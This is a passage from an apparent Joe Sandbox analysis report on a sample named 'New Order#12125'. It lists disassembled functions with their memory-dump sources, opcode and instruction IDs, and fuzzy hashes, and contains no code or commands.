                                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                        • Instruction Fuzzy Hash: FBE0D832254146AFD3212A598800B7A7BE7FBD17A0F150429E200CF150DBF0DC42C7D8
                                                                        Function 015D4164 Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 112f46e59a7665649f46ea30997378864f95fed2ae5f09b6f9a3bd72ce31da40
                                                                        • Instruction ID: 6b87887ec5b1c106051fa4555df8540958aabe346f9853377e62d971a2be22fd
                                                                        • Opcode Fuzzy Hash: 112f46e59a7665649f46ea30997378864f95fed2ae5f09b6f9a3bd72ce31da40
                                                                        • Instruction Fuzzy Hash: 34F0A931A26A928FE772D7BCE280B5E77E0BB50A20F0A05A4D4108FD12C330EC80C750
                                                                        Function 015A678E Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction ID: 5ce1dfb9cb368c16d29eddfe25e969e0b0169d1732906491026ab71fd4ae9c05
                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction Fuzzy Hash: 01E0DF72A40120BBEB22A7998D05F9EBEACEBD0EA0F090054B600EB0E0E530DE00C6D0
                                                                        Function 015D08C0 Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                        • Instruction ID: 24ec77fb28a4277a6f311d75e137f4cf1c66b67de339270e96584310559d4652
                                                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                        • Instruction Fuzzy Hash: 49E09B316407508BCB359A1DC141A57BFE8FFD5660F15806DE9054B653C231F842C7D0
                                                                        Function 015025E0 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 77fea782f90e908d5849556e5723434a8bf9381b33aed84e6117b979eb7271d1
                                                                        • Instruction ID: 77db1ecf33e83d1968411c7b3647072c6c5afd4c7a6ea7d7d1b77631bf111187
                                                                        • Opcode Fuzzy Hash: 77fea782f90e908d5849556e5723434a8bf9381b33aed84e6117b979eb7271d1
                                                                        • Instruction Fuzzy Hash: 5DE092321009559BC322BB69DD01F8A779AFFA0364F014529B1555B190CB30A810C784
                                                                        Function 015BA456 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                        • Instruction ID: cc5bdb510506bcc945fbc3a5ca992e7bf13243110a67f2643ad920b33b4eb905
                                                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                        • Instruction Fuzzy Hash: 00E01232010A52DFE7366F2AD958B967BE1FFD0715F148C2DE1961A5F0C7B998C1CA40
                                                                        Function 01584000 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction ID: 9d0710d0dec7c89492290f025d6a4fd0e662e732ca51873ca2134616616a8e25
                                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction Fuzzy Hash: A1E04E75300346DBE715DF19C054B667BA6BFD5A50F28C069A9488F205EB36A8438A51
                                                                        Function 0153CA38 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99961128529c2c2366503889f7dd24f8cf339b7edc233768a528b2d7d8b00513
                                                                        • Instruction ID: 5dde8d364fc0bd3b9c41b3eee0e7c67d01ffeb8a497e1471e1cb3c270db7d1b1
                                                                        • Opcode Fuzzy Hash: 99961128529c2c2366503889f7dd24f8cf339b7edc233768a528b2d7d8b00513
                                                                        • Instruction Fuzzy Hash: 11D02B334810316ECB36F128BC04F973B99BBC1220F024862F108FF051D5A4CC8292C4
                                                                        Function 014F823B Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction ID: d8160d887d8707c640ff750a91d3553e02de7a50d4d3b8da8fef432368c8c720
                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction Fuzzy Hash: 78E08C35000A22EFDB322F15EC10B5276A1FF94B64F22482EF1820E1B58770A882CA44
                                                                        Function 01502050 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e283f87162f6299c2fafbd74fa34d62baffe4a0371ae0674834acd6e55ec6592
                                                                        • Instruction ID: d227a4101d734cee793ed6823d81273b232a84c6c42746944e83b18815c359be
                                                                        • Opcode Fuzzy Hash: e283f87162f6299c2fafbd74fa34d62baffe4a0371ae0674834acd6e55ec6592
                                                                        • Instruction Fuzzy Hash: D7E08C321004516BC212FA9DDD11E4A739AFFE4260F010125B1518B2D4CA20AC00C794
                                                                        Function 01538A90 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction ID: 5b76b95668db4e5209a494717d3f9771c412364b93628cf3f688421852be48f2
                                                                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction Fuzzy Hash: F1E08633111A1487C729DE18D511B7677E4FF85730F09473EA6138B780C574E544C794
                                                                        Function 0153E59C Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction ID: fdc6c5168658ae78a24ec798ea8c8354a35ca25e319609f08aee202c0f0880e1
                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction Fuzzy Hash: BFD0A932214620ABE772AA1CFC00FC333E8BB88734F060459B008CB060C360AC81CA84
                                                                        Function 0157E908 Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction ID: c2f70c7af9c086d308a2dd130b472b2ad421263f3537a7ddf7dd01ab4087ede8
                                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction Fuzzy Hash: 55E0EC369507859BDF53DF99D641F5EBBB9FF94B40F150458A1085F660C724AD00CB40
                                                                        Function 014FA0E3 Relevance: .0, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction ID: e4cf40c1675dcc46ab3276b7e4d1d14419492cfddba3404cbbbe6c79fa61af2d
                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction Fuzzy Hash: EAD0223222203197EB295A55A910F637905EFC0AA4F2A002E360E93A10C0248C43C2E0
                                                                        Function 0153A830 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                        • Instruction ID: 39d9677fa07caf9976872f2501a548045004a4de0db184b6f3a45d0984885ecb
                                                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                        • Instruction Fuzzy Hash: CDD012371E054DBBDB129F66DC01F957BA9FBA4BA0F444020B5048B5A0D63AE950D584
                                                                        Function 0153CA24 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 284261957f1f85fda1072669877ff66ee0ccd73ad40cac0ed56651fe9040a1fe
                                                                        • Instruction ID: 9d0c7c412d7e19e6337f9bbbdede60746cd178c271b60b2abef6165b593693be
                                                                        • Opcode Fuzzy Hash: 284261957f1f85fda1072669877ff66ee0ccd73ad40cac0ed56651fe9040a1fe
                                                                        • Instruction Fuzzy Hash: E0D0A730921002CBDF17DF48C515D2E37F1FF50644B40006CE701AE420E364EC02C710
                                                                        Function 015102A0 Relevance: .0, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction ID: 67fda6a2950abfacc4a63a63c04d565fc5132d38f88c4cca0721d149f1f07922
                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction Fuzzy Hash: FFD0C935212E80CFE71BDB0CC5A4B5933E8BB44B44F814890F401CFB66D62CD980CA40
                                                                        Function 0153C700 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction ID: 71e1e3fa1bb945f03bd345fdcfc4e1263768369286aaf0b82851d55d7fa269d6
                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction Fuzzy Hash: 68C012322A0648AFD712AA99CD01F027BA9FBA8B50F000021F2048B670D631E820EA84
                                                                        Function 01520310 Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction ID: 0d8b178a3c63bce289dcf6604683ea3234637f686c4fa940e751b43eb3d81bfb
                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction Fuzzy Hash: 6ED01237100249EFCB05DF45C890D9A772AFBD8710F108019FD190B6508A31ED62DA90
                                                                        Function 01500750 Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction ID: 60bec5e2460bf5cc3813db8ad4ecde4f89bf0c4b987a4ef364b03e229f54d5dd
                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction Fuzzy Hash: 00C04879B01A428FDF56DB6AD2A4F49B7E4FB84790F150890E845CFB22E624E901CA10
                                                                        Function 01544340 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b437deeb90b7eff2a49a9d95750fc022bda96382db6c971eb82c613f6eb5355f
                                                                        • Instruction ID: cd2810c3ae8062881371a5182ae5672492cf55826e4ceddf3bf37c694559583a
                                                                        • Opcode Fuzzy Hash: b437deeb90b7eff2a49a9d95750fc022bda96382db6c971eb82c613f6eb5355f
                                                                        • Instruction Fuzzy Hash: 6A900231605800129280715988945464045B7E0311B59C412F4424954CCA548A565761
                                                                        Function 01544650 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa9699895cae5e3ebbdaa42c8a7923ee052af60a080fb5bb4469d72c1555b7f4
                                                                        • Instruction ID: f37de82b517438baf1f5cd146ca2cd8cb2a901f990cb3ba6fcccdafd2cd628c8
                                                                        • Opcode Fuzzy Hash: fa9699895cae5e3ebbdaa42c8a7923ee052af60a080fb5bb4469d72c1555b7f4
                                                                        • Instruction Fuzzy Hash: D1900261601500424280715988144066045B7E1311399C516B4554960CC65889559769
                                                                        Function 01542BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d743f08009619bd19744aed582edb2524dd008909b27d379643e40ed638045f7
                                                                        • Instruction ID: 0938a968eefb6af81e0f002140e769cb0279ea4644d7775395fd66992ddced36
                                                                        • Opcode Fuzzy Hash: d743f08009619bd19744aed582edb2524dd008909b27d379643e40ed638045f7
                                                                        • Instruction Fuzzy Hash: 7A90023120140802D2C07159841464A0045A7D1311F99C416B4025A54DCA558B597BA1
                                                                        Function 01542BE0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b8f850e3897b600856afdcaa7c3ba4a8f0260f5af12edffd6cb7372bbc90c76
                                                                        • Instruction ID: c73e9a5d87c6d9f3860d6dc39b3515a4d1af4758600431f1203fb82266d3829c
                                                                        • Opcode Fuzzy Hash: 4b8f850e3897b600856afdcaa7c3ba4a8f0260f5af12edffd6cb7372bbc90c76
                                                                        • Instruction Fuzzy Hash: BA90023120544842D28071598414A460055A7D0315F59C412B4064A94DD6658E55BB61
                                                                        Function 01542B80 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fef496b53598d154f32b6125d155c89dcbf3774c45bca005894a7919d6f79ddf
                                                                        • Instruction ID: 298b3e5df36c5517d2ef66907452ecb71eeeec3cb27b360a7e35995b3f54f77b
                                                                        • Opcode Fuzzy Hash: fef496b53598d154f32b6125d155c89dcbf3774c45bca005894a7919d6f79ddf
                                                                        • Instruction Fuzzy Hash: E390023120140802D244715988146860045A7D0311F59C412BA024A55ED6A589917631
                                                                        Function 01542BA0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 882ed77e62cff1bb06fb5d72e192722447f6db873fcb81011371fb690e91d1b9
                                                                        • Instruction ID: 8b6b4252511524c0c996783177199e401334055d7c86dbc0c17649f43074399f
                                                                        • Opcode Fuzzy Hash: 882ed77e62cff1bb06fb5d72e192722447f6db873fcb81011371fb690e91d1b9
                                                                        • Instruction Fuzzy Hash: 8E90023160540802D290715984247460045A7D0311F59C412B4024A54DC7958B557BA1
                                                                        Function 01542AD0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46da559da64f04210ff63fb1b65be8f089c44f9b10ede0a086952cd92f4abc5d
                                                                        • Instruction ID: 214febbc71f1f339fbcb0d4245c7f172611659158d17247f191078edcd20053f
                                                                        • Opcode Fuzzy Hash: 46da559da64f04210ff63fb1b65be8f089c44f9b10ede0a086952cd92f4abc5d
                                                                        • Instruction Fuzzy Hash: BF900225211400030245B55947145070086A7D5361359C422F5015950CD66189615621
                                                                        Function 01542AF0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 999838836efa49ac1d32ac72ea6624b87642d745dde03eb3f153beedd90c581c
                                                                        • Instruction ID: f77e9253932dc39f8c83ad507a0500bf4286f8a34b87f5b02a86a953f58574f1
                                                                        • Opcode Fuzzy Hash: 999838836efa49ac1d32ac72ea6624b87642d745dde03eb3f153beedd90c581c
                                                                        • Instruction Fuzzy Hash: 62900225221400020285B559461450B0485B7D6361399C416F5416990CC66189655721
                                                                        Function 01542AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9adcecad03332ed1a7f1c74533c82f8a57d30e3df31675055fb078e4cf76339a
                                                                        • Instruction ID: 73886268a93384123654ba84723b62d6149f568040db39f719c2bd4c3399fc85
                                                                        • Opcode Fuzzy Hash: 9adcecad03332ed1a7f1c74533c82f8a57d30e3df31675055fb078e4cf76339a
                                                                        • Instruction Fuzzy Hash: A19002A1201540924640B259C414B0A4545A7E0211B59C417F5054960CC56589519635
                                                                        Function 01542D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d09686f06ac8bd886c66cd2aa835ccdc6997edcaad41d35b73eae4a0df1b9707
                                                                        • Instruction ID: 77283983e8adf80243d304dc9aaea7f0b089048d6131e1e8edcbfbd5d63bb71e
                                                                        • Opcode Fuzzy Hash: d09686f06ac8bd886c66cd2aa835ccdc6997edcaad41d35b73eae4a0df1b9707
                                                                        • Instruction Fuzzy Hash: 5B90022921340002D2C07159941860A0045A7D1212F99D816B4015958CC95589695721
                                                                        Function 01542D00 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e7e0041da0e0baba465cab7cce9df9b76b53c4c4fdb6f0a3aa4e7a205a49882
                                                                        • Instruction ID: 80414542f3a60442ad63fe92b1942e27aab3895744b7bcf00872f460709ce801
                                                                        • Opcode Fuzzy Hash: 5e7e0041da0e0baba465cab7cce9df9b76b53c4c4fdb6f0a3aa4e7a205a49882
                                                                        • Instruction Fuzzy Hash: 5490022120544442D24075599418A060045A7D0215F59D412B5064995DC6758951A631
                                                                        Function 01542D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 985c89aaf813e0363916cd9f438d79f44077e5a11e5eaea0c10e65e55ca66ec0
                                                                        • Instruction ID: b9e1b903de34bbc1754d26dc6148e3c8e338ae57dde023953e2d7a0a12317363
                                                                        • Opcode Fuzzy Hash: 985c89aaf813e0363916cd9f438d79f44077e5a11e5eaea0c10e65e55ca66ec0
                                                                        • Instruction Fuzzy Hash: C990022130140003D280715994286064045F7E1311F59D412F4414954CD95589565722
                                                                        Function 01542DD0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
